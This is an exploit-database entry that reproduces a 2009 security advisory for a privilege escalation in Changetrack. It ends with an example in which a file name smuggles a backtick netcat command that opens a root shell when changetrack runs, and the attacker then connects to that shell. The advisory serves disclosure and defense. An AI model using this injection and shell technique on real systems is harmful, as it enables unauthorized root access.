header-logo
Suggest Exploit
vendor:
Changetrack
by:
Marek Grzybowski
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Changetrack
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Changetrack Privilege Escalation Vulnerability

A vulnerability has been discovered in Changetrack, which can be exploited by malicious, local users to gain escalated privileges. The application does not properly escape certain file names, which can be exploited to inject and execute arbitrary shell commands (potentially with "root" privileges) by creating a maliciously named file in a directory tracked by Changetrack. Successful exploitation requires write privileges to a directory scanned by Changetrack.

Mitigation:

Use Changetrack to track trusted directories only.
Source

Exploit-DB raw data:

TITLE:
Changetrack Privilege Escalation Vulnerability

SECUNIA ADVISORY ID:
SA36756

VERIFY ADVISORY:
http://secunia.com/advisories/36756/

DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.

The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.

Successful exploitation requires write privileges to a directory
scanned by Changetrack.

SOLUTION:
Use Changetrack to track trusted directories only.

PROVIDED AND/OR DISCOVERED BY:
Marek Grzybowski


--------------------------------------------------------------------------------
Example of exploitation:

------------ Attacker ----------

rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
rick@testmachine:~/testt$ ls
<`nc -l -p 5001 -e $SHELL`

--------------------------------


------------ root --------------

testmachine:~# changetrack 

------------ root --------------



------------ Attacker ----------

rick@testmachine:~/testt$ nc 127.0.0.1 5001
id
uid=0(root) gid=0(root) groups=0(root)

--------------------------------

# milw0rm.com [2009-09-17]